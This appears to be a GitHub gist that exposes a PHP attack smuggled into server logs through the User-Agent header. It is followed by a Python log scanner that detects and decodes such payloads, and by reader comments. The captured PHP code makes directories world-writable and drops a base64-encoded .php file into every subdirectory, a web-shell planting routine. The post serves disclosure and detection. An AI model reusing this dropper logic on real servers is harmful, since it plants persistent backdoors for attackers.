@bortzmeyer
Created February 15, 2013 17:54
PHP attack through log files (code in the User-Agent header)

@ini_set('allow_url_fopen', 1);
addLoader();                       // drop the file in the current directory first
$data = @opendir('.');
while ($file = @readdir($data))
{
    $file = trim($file);
    // skip "." / ".." and anything that is not a directory
    if (!$file || preg_match('/^\.+$/', $file) || !is_dir($file)) continue;
    addLoader($file);              // ... then in every subdirectory
}
@closedir($data);

function addLoader($dir = '')
{
    if ($dir) $dir .= '/';
    @chmod($dir, 777);             // decimal 777, not octal 0777; the @ silences any error
    $fp = fopen("{$dir}2716479cdad403d091d623daaf66cd15.php", "w");
    fwrite($fp, base64_decode('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'));
    fclose($fp);
    if (file_exists("{$dir}2716479cdad403d091d623daaf66cd15.php"))
    {
        $ck = "1823649365820354";
        print "$ck:{*}:$dir:{*}:";   // success marker echoed back with the path where the file landed
        exit;
    }
}
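As an added example (not part of the gist or its comments), a small Python scanner that flags access-log entries whose User-Agent field carries PHP code and peels the nested base64 layers that one of the comments below describes having to decode twice. The log format is Apache "combined"; the log lines, IPs and payload are constructed for the demo and echo the gist's code.

```python
import base64
import re

# Apache "combined" format; the User-Agent is the last quoted field (\" escapes tolerated).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?:[^"\\]|\\.)*" '
                    r'(?P<status>\d{3}) \S+ "(?:[^"\\]|\\.)*" "(?P<ua>(?:[^"\\]|\\.)*)"$')
# PHP constructs that have no business in a browser's User-Agent string.
PHP_MARKERS = re.compile(
    r'<\?php|\b(?:eval|base64_decode|fopen|fwrite|chmod|system|passthru)\s*\(', re.I)
B64_ARG = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def unwrap_base64(s, max_depth=5):
    """Peel nested base64_decode('...') layers; returns each decoded layer in order."""
    layers = []
    for _ in range(max_depth):
        m = B64_ARG.search(s)
        if not m:
            break
        try:
            s = base64.b64decode(m.group(1), validate=True).decode('utf-8', 'replace')
        except ValueError:  # binascii.Error (bad padding/alphabet) is a ValueError
            break
        layers.append(s)
    return layers

def scan_log(text):
    """Return one finding per log line whose User-Agent carries PHP code."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: not this detector's job
        ua = m.group('ua')
        if PHP_MARKERS.search(ua):
            findings.append({'ip': m.group('ip'), 'time': m.group('time'),
                             'ua': ua, 'decoded': unwrap_base64(ua)})
    return findings

# Constructed sample: two benign requests and one whose UA injects PHP wrapped in
# two base64 layers, as described in the thread. IPs are RFC 5737 documentation ranges.
INNER = "@ini_set('allow_url_fopen', 1); @chmod($dir, 777);"  # echoes the gist's code
MIDDLE = f"eval(base64_decode('{base64.b64encode(INNER.encode()).decode()}'));"
PAYLOAD_UA = f"<?php eval(base64_decode('{base64.b64encode(MIDDLE.encode()).decode()}')); ?>"
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [15/Feb/2013:17:54:01 +0100] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/18.0"',
    '203.0.113.7 - - [15/Feb/2013:17:54:02 +0100] "GET /robots.txt HTTP/1.1" 404 209 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"',
    f'198.51.100.9 - - [15/Feb/2013:17:55:10 +0100] "GET / HTTP/1.1" 200 512 "-" "{PAYLOAD_UA}"',
])
for f in scan_log(SAMPLE_LOG):  # stand-alone run: print each hit and its decoded layers
    print(f"{f['ip']} {f['time']}: PHP in User-Agent, layers={f['decoded']}")
```

Run it over a real access log by reading the file into `scan_log`; a hit with decoded layers containing fopen/fwrite calls is the signal to check the document root for dropped .php files.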
@bortzmeyer (Author)

And the second code in the fwrite:

@zvarnell

Any idea where this was coming from?

@CorkyMoo

Hello,

Messed my logs up.
I missed my logs from a pay site.
Created some with PHP.
In my PHP created logs was a large 64-decode chunk where the UA would have been.
I decoded it twice, a piece of 64-decode within a piece.
I was fairly certain it was an attack of some kind.
Their IP was from Romania.
Yours is exactly the same as mine.
Please check out go.to/moo. corkymoo.net63.net